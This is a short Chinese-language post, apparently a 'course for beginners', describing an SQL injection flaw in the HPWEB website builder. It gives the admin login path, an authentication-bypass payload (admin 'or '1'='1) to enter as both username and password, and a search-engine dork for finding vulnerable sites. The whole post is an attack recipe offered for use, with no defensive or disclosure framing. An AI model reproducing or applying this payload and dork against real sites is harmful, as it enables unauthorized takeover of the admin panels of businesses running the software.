HPWEB成品网站,版面较好,看起来比较大气,而且支持可视化操作及拖拽,得到越来越多的企业及网络公司青睐。
但是程序本身存在一个致命的漏洞,可以通过SQL注入的方式轻松进入管理员控制后台。
比如网站的域名是xxxx.com,那么后台登陆地址应该是xxxx.com/admin.php,如下图:
万能账号:admin 'or '1'='1
万能密码:admin 'or '1'='1
这样的话就能进入管理系统了。
后台扫描:inurl:news/html/?411.html
此课程只正对小白的课程!
